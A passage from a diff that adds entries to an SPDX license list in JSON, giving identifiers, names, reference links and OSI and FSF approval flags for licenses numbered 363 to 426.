+      "reference": "https://spdx.org/licenses/Borceux.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Borceux.json",
+      "referenceNumber": 363,
+      "name": "Borceux license",
+      "licenseId": "Borceux",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Borceux"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-1.1.json",
+      "referenceNumber": 364,
+      "name": "Open LDAP Public License v1.1",
+      "licenseId": "OLDAP-1.1",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d806557a5ad59804ef3a44d5abfbe91d706b0791f"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OFL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OFL-1.0.json",
+      "referenceNumber": 365,
+      "name": "SIL Open Font License 1.0",
+      "licenseId": "OFL-1.0",
+      "seeAlso": [
+        "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NASA-1.3.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NASA-1.3.json",
+      "referenceNumber": 366,
+      "name": "NASA Open Source Agreement 1.3",
+      "licenseId": "NASA-1.3",
+      "seeAlso": [
+        "http://ti.arc.nasa.gov/opensource/nosa/",
+        "https://opensource.org/licenses/NASA-1.3"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/VOSTROM.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/VOSTROM.json",
+      "referenceNumber": 367,
+      "name": "VOSTROM Public License for Open Source",
+      "licenseId": "VOSTROM",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/VOSTROM"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-0.json",
+      "referenceNumber": 368,
+      "name": "MIT No Attribution",
+      "licenseId": "MIT-0",
+      "seeAlso": [
+        "https://github.com/aws/mit-0",
+        "https://romanrm.net/mit-zero",
+        "https://github.com/awsdocs/aws-cloud9-user-guide/blob/master/LICENSE-SAMPLECODE"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ISC.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ISC.json",
+      "referenceNumber": 369,
+      "name": "ISC License",
+      "licenseId": "ISC",
+      "seeAlso": [
+        "https://www.isc.org/licenses/",
+        "https://www.isc.org/downloads/software-support-policy/isc-license/",
+        "https://opensource.org/licenses/ISC"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Unicode-DFS-2016.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2016.json",
+      "referenceNumber": 370,
+      "name": "Unicode License Agreement - Data Files and Software (2016)",
+      "licenseId": "Unicode-DFS-2016",
+      "seeAlso": [
+        "http://www.unicode.org/copyright.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BlueOak-1.0.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BlueOak-1.0.0.json",
+      "referenceNumber": 371,
+      "name": "Blue Oak Model License 1.0.0",
+      "licenseId": "BlueOak-1.0.0",
+      "seeAlso": [
+        "https://blueoakcouncil.org/license/1.0.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.json",
+      "referenceNumber": 372,
+      "name": "Licence Libre du Québec – Réciprocité forte version 1.1",
+      "licenseId": "LiLiQ-Rplus-1.1",
+      "seeAlso": [
+        "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-forte-liliq-r-v1-1/",
+        "http://opensource.org/licenses/LiLiQ-Rplus-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NOSL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NOSL.json",
+      "referenceNumber": 373,
+      "name": "Netizen Open Source License",
+      "licenseId": "NOSL",
+      "seeAlso": [
+        "http://bits.netizen.com.au/licenses/NOSL/nosl.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SMLNJ.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SMLNJ.json",
+      "referenceNumber": 374,
+      "name": "Standard ML of New Jersey License",
+      "licenseId": "SMLNJ",
+      "seeAlso": [
+        "https://www.smlnj.org/license.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-3.0+.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-3.0+.json",
+      "referenceNumber": 375,
+      "name": "GNU Lesser General Public License v3.0 or later",
+      "licenseId": "LGPL-3.0+",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+        "https://opensource.org/licenses/LGPL-3.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CPAL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CPAL-1.0.json",
+      "referenceNumber": 376,
+      "name": "Common Public Attribution License 1.0",
+      "licenseId": "CPAL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/CPAL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/PSF-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PSF-2.0.json",
+      "referenceNumber": 377,
+      "name": "Python Software Foundation License 2.0",
+      "licenseId": "PSF-2.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/Python-2.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/RPL-1.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/RPL-1.5.json",
+      "referenceNumber": 378,
+      "name": "Reciprocal Public License 1.5",
+      "licenseId": "RPL-1.5",
+      "seeAlso": [
+        "https://opensource.org/licenses/RPL-1.5"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.json",
+      "referenceNumber": 379,
+      "name": "BSD 2-Clause FreeBSD License",
+      "licenseId": "BSD-2-Clause-FreeBSD",
+      "seeAlso": [
+        "http://www.freebsd.org/copyright/freebsd-license.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-Modern-Variant.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-Modern-Variant.json",
+      "referenceNumber": 380,
+      "name": "MIT License Modern Variant",
+      "licenseId": "MIT-Modern-Variant",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing:MIT#Modern_Variants",
+        "https://ptolemy.berkeley.edu/copyright.htm",
+        "https://pirlwww.lpl.arizona.edu/resources/guide/software/PerlTk/Tixlic.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Nokia.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Nokia.json",
+      "referenceNumber": 381,
+      "name": "Nokia Open Source License",
+      "licenseId": "Nokia",
+      "seeAlso": [
+        "https://opensource.org/licenses/nokia"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.json",
+      "referenceNumber": 382,
+      "name": "GNU Free Documentation License v1.1 only - no invariants",
+      "licenseId": "GFDL-1.1-no-invariants-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/PDDL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PDDL-1.0.json",
+      "referenceNumber": 383,
+      "name": "Open Data Commons Public Domain Dedication \u0026 License 1.0",
+      "licenseId": "PDDL-1.0",
+      "seeAlso": [
+        "http://opendatacommons.org/licenses/pddl/1.0/",
+        "https://opendatacommons.org/licenses/pddl/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/EUPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EUPL-1.0.json",
+      "referenceNumber": 384,
+      "name": "European Union Public License 1.0",
+      "licenseId": "EUPL-1.0",
+      "seeAlso": [
+        "http://ec.europa.eu/idabc/en/document/7330.html",
+        "http://ec.europa.eu/idabc/servlets/Doc027f.pdf?id\u003d31096"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CDDL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CDDL-1.1.json",
+      "referenceNumber": 385,
+      "name": "Common Development and Distribution License 1.1",
+      "licenseId": "CDDL-1.1",
+      "seeAlso": [
+        "http://glassfish.java.net/public/CDDL+GPL_1_1.html",
+        "https://javaee.github.io/glassfish/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.3-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-only.json",
+      "referenceNumber": 386,
+      "name": "GNU Free Documentation License v1.3 only",
+      "licenseId": "GFDL-1.3-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/fdl-1.3.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.6.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.6.json",
+      "referenceNumber": 387,
+      "name": "Open LDAP Public License v2.6",
+      "licenseId": "OLDAP-2.6",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d1cae062821881f41b73012ba816434897abf4205"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/JSON.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/JSON.json",
+      "referenceNumber": 388,
+      "name": "JSON License",
+      "licenseId": "JSON",
+      "seeAlso": [
+        "http://www.json.org/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-3.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-or-later.json",
+      "referenceNumber": 389,
+      "name": "GNU Lesser General Public License v3.0 or later",
+      "licenseId": "LGPL-3.0-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+        "https://opensource.org/licenses/LGPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-3.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-3.0.json",
+      "referenceNumber": 390,
+      "name": "GNU General Public License v3.0 only",
+      "licenseId": "GPL-3.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+        "https://opensource.org/licenses/GPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Fair.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Fair.json",
+      "referenceNumber": 391,
+      "name": "Fair License",
+      "licenseId": "Fair",
+      "seeAlso": [
+        "http://fairlicense.org/",
+        "https://opensource.org/licenses/Fair"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-with-font-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-font-exception.json",
+      "referenceNumber": 392,
+      "name": "GNU General Public License v2.0 w/Font exception",
+      "licenseId": "GPL-2.0-with-font-exception",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/gpl-faq.html#FontException"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OSL-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OSL-2.1.json",
+      "referenceNumber": 393,
+      "name": "Open Software License 2.1",
+      "licenseId": "OSL-2.1",
+      "seeAlso": [
+        "http://web.archive.org/web/20050212003940/http://www.rosenlaw.com/osl21.htm",
+        "https://opensource.org/licenses/OSL-2.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPPL-1.3a.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPPL-1.3a.json",
+      "referenceNumber": 394,
+      "name": "LaTeX Project Public License v1.3a",
+      "licenseId": "LPPL-1.3a",
+      "seeAlso": [
+        "http://www.latex-project.org/lppl/lppl-1-3a.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NAIST-2003.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NAIST-2003.json",
+      "referenceNumber": 395,
+      "name": "Nara Institute of Science and Technology License (2003)",
+      "licenseId": "NAIST-2003",
+      "seeAlso": [
+        "https://enterprise.dejacode.com/licenses/public/naist-2003/#license-text",
+        "https://github.com/nodejs/node/blob/4a19cc8947b1bba2b2d27816ec3d0edf9b28e503/LICENSE#L343"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.json",
+      "referenceNumber": 396,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 4.0 International",
+      "licenseId": "CC-BY-NC-ND-4.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.json",
+      "referenceNumber": 397,
+      "name": "Creative Commons Attribution Non Commercial 3.0 Germany",
+      "licenseId": "CC-BY-NC-3.0-DE",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc/3.0/de/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.1+.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.1+.json",
+      "referenceNumber": 398,
+      "name": "GNU Library General Public License v2.1 or later",
+      "licenseId": "LGPL-2.1+",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+        "https://opensource.org/licenses/LGPL-2.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OPL-1.0.json",
+      "referenceNumber": 399,
+      "name": "Open Public License v1.0",
+      "licenseId": "OPL-1.0",
+      "seeAlso": [
+        "http://old.koalateam.com/jackaroo/OPL_1_0.TXT",
+        "https://fedoraproject.org/wiki/Licensing/Open_Public_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/HPND-sell-variant.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/HPND-sell-variant.json",
+      "referenceNumber": 400,
+      "name": "Historical Permission Notice and Disclaimer - sell variant",
+      "licenseId": "HPND-sell-variant",
+      "seeAlso": [
+        "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/sunrpc/auth_gss/gss_generic_token.c?h\u003dv4.19"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/QPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/QPL-1.0.json",
+      "referenceNumber": 401,
+      "name": "Q Public License 1.0",
+      "licenseId": "QPL-1.0",
+      "seeAlso": [
+        "http://doc.qt.nokia.com/3.3/license.html",
+        "https://opensource.org/licenses/QPL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/EUPL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EUPL-1.2.json",
+      "referenceNumber": 402,
+      "name": "European Union Public License 1.2",
+      "licenseId": "EUPL-1.2",
+      "seeAlso": [
+        "https://joinup.ec.europa.eu/page/eupl-text-11-12",
+        "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl_v1.2_en.pdf",
+        "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/2020-03/EUPL-1.2%20EN.txt",
+        "https://joinup.ec.europa.eu/sites/default/files/inline-files/EUPL%20v1_2%20EN(1).txt",
+        "http://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri\u003dCELEX:32017D0863",
+        "https://opensource.org/licenses/EUPL-1.2"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.json",
+      "referenceNumber": 403,
+      "name": "GNU Free Documentation License v1.2 or later - no invariants",
+      "licenseId": "GFDL-1.2-no-invariants-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/eCos-2.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/eCos-2.0.json",
+      "referenceNumber": 404,
+      "name": "eCos license version 2.0",
+      "licenseId": "eCos-2.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/ecos-license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NCGL-UK-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NCGL-UK-2.0.json",
+      "referenceNumber": 405,
+      "name": "Non-Commercial Government Licence",
+      "licenseId": "NCGL-UK-2.0",
+      "seeAlso": [
+        "http://www.nationalarchives.gov.uk/doc/non-commercial-government-licence/version/2/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Beerware.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Beerware.json",
+      "referenceNumber": 406,
+      "name": "Beerware License",
+      "licenseId": "Beerware",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Beerware",
+        "https://people.freebsd.org/~phk/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.json",
+      "referenceNumber": 407,
+      "name": "BSD 3-Clause Open MPI variant",
+      "licenseId": "BSD-3-Clause-Open-MPI",
+      "seeAlso": [
+        "https://www.open-mpi.org/community/license.php",
+        "http://www.netlib.org/lapack/LICENSE.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.json",
+      "referenceNumber": 408,
+      "name": "GNU General Public License v2.0 w/Bison exception",
+      "licenseId": "GPL-2.0-with-bison-exception",
+      "seeAlso": [
+        "http://git.savannah.gnu.org/cgit/bison.git/tree/data/yacc.c?id\u003d193d7c7054ba7197b0789e14965b739162319b5e#n141"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CECILL-B.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CECILL-B.json",
+      "referenceNumber": 409,
+      "name": "CeCILL-B Free Software License Agreement",
+      "licenseId": "CECILL-B",
+      "seeAlso": [
+        "http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.json",
+      "referenceNumber": 410,
+      "name": "GNU General Public License v2.0 w/Autoconf exception",
+      "licenseId": "GPL-2.0-with-autoconf-exception",
+      "seeAlso": [
+        "http://ac-archive.sourceforge.net/doc/copyright.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/EPL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EPL-2.0.json",
+      "referenceNumber": 411,
+      "name": "Eclipse Public License 2.0",
+      "licenseId": "EPL-2.0",
+      "seeAlso": [
+        "https://www.eclipse.org/legal/epl-2.0",
+        "https://www.opensource.org/licenses/EPL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-feh.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-feh.json",
+      "referenceNumber": 412,
+      "name": "feh License",
+      "licenseId": "MIT-feh",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MIT#feh"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/RPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/RPL-1.1.json",
+      "referenceNumber": 413,
+      "name": "Reciprocal Public License 1.1",
+      "licenseId": "RPL-1.1",
+      "seeAlso": [
+        "https://opensource.org/licenses/RPL-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CDLA-Permissive-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-1.0.json",
+      "referenceNumber": 414,
+      "name": "Community Data License Agreement Permissive 1.0",
+      "licenseId": "CDLA-Permissive-1.0",
+      "seeAlso": [
+        "https://cdla.io/permissive-1-0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Python-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Python-2.0.json",
+      "referenceNumber": 415,
+      "name": "Python License 2.0",
+      "licenseId": "Python-2.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/Python-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MPL-1.0.json",
+      "referenceNumber": 416,
+      "name": "Mozilla Public License 1.0",
+      "licenseId": "MPL-1.0",
+      "seeAlso": [
+        "http://www.mozilla.org/MPL/MPL-1.0.html",
+        "https://opensource.org/licenses/MPL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-or-later.json",
+      "referenceNumber": 417,
+      "name": "GNU Free Documentation License v1.1 or later",
+      "licenseId": "GFDL-1.1-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/diffmark.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/diffmark.json",
+      "referenceNumber": 418,
+      "name": "diffmark license",
+      "licenseId": "diffmark",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/diffmark"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-1.0+.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-1.0+.json",
+      "referenceNumber": 419,
+      "name": "GNU General Public License v1.0 or later",
+      "licenseId": "GPL-1.0+",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OpenSSL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OpenSSL.json",
+      "referenceNumber": 420,
+      "name": "OpenSSL License",
+      "licenseId": "OpenSSL",
+      "seeAlso": [
+        "http://www.openssl.org/source/license.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OSL-1.0.json",
+      "referenceNumber": 421,
+      "name": "Open Software License 1.0",
+      "licenseId": "OSL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/OSL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Parity-6.0.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Parity-6.0.0.json",
+      "referenceNumber": 422,
+      "name": "The Parity Public License 6.0.0",
+      "licenseId": "Parity-6.0.0",
+      "seeAlso": [
+        "https://paritylicense.com/versions/6.0.0.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AGPL-1.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/AGPL-1.0.json",
+      "referenceNumber": 423,
+      "name": "Affero General Public License v1.0",
+      "licenseId": "AGPL-1.0",
+      "seeAlso": [
+        "http://www.affero.org/oagpl.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/YPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/YPL-1.1.json",
+      "referenceNumber": 424,
+      "name": "Yahoo! Public License v1.1",
+      "licenseId": "YPL-1.1",
+      "seeAlso": [
+        "http://www.zimbra.com/license/yahoo_public_license_1.1.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SSH-short.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SSH-short.json",
+      "referenceNumber": 425,
+      "name": "SSH short notice",
+      "licenseId": "SSH-short",
+      "seeAlso": [
+        "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/pathnames.h",
+        "http://web.mit.edu/kolya/.f/root/athena.mit.edu/sipb.mit.edu/project/openssh/OldFiles/src/openssh-2.9.9p2/ssh-add.1",
+        "https://joinup.ec.europa.eu/svn/lesoll/trunk/italc/lib/src/dsa_key.cpp"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/IBM-pibs.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/IBM-pibs.json",
+      "referenceNumber": 426,
+      "name": "IBM PowerPC Initialization and Boot Software",
+      "licenseId": "IBM-pibs",
+      "seeAlso": [
+        "http://git.denx.de/?p\u003du-boot.git;a\u003dblob;f\u003darch/powerpc/cpu/ppc4xx/miiphy.c;h\u003d297155fdafa064b955e53e9832de93bfb0cfb85b;hb\u003d9fab4bf4cc077c21e43941866f3f2c196f28670d"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Xnet.html",
